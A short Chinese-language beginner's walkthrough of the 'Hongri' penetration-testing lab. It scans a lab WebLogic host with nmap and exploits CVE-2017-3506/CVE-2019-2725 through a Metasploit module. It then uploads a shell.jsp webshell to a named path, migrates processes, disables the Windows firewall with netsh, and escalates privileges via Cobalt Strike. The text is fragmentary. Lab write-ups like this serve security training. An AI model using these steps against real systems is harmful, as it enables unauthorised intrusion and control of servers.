红日靶场（初学）

按照以前的来说一般是有两层网络的内网和外网

这个也是这样的

所以需要两张网卡，一个用来向外网提供web服务，一个是通向内网

以下就是配置

 

 以下就是一些相关信息

 外网网段是写成了192.168.111.1/24

WEB

PC

DC

 kali

 开始扫描

nmap -sS -sV -Pn -T4 192.168.111.80

 两个CVE漏洞，CVE-2017-3506、CVE-2019-2725

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice

 

 生成木马

还需要下载一个java反序列化工具

Releases · shack2/javaserializetools · GitHub

上传路径

 \Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

用shell systeminfo命令

我们需要改一下乱码

用chcp 65001解决出现的乱码

 用ps命令查看进程

 进程迁移

关闭防火墙  netsh advfirewall set allprofiles state off

内网就需要Java11和涉及到提权的了，我们也是直接在cs中提权的

也是第一次接触这个靶场，还有需要改进的地方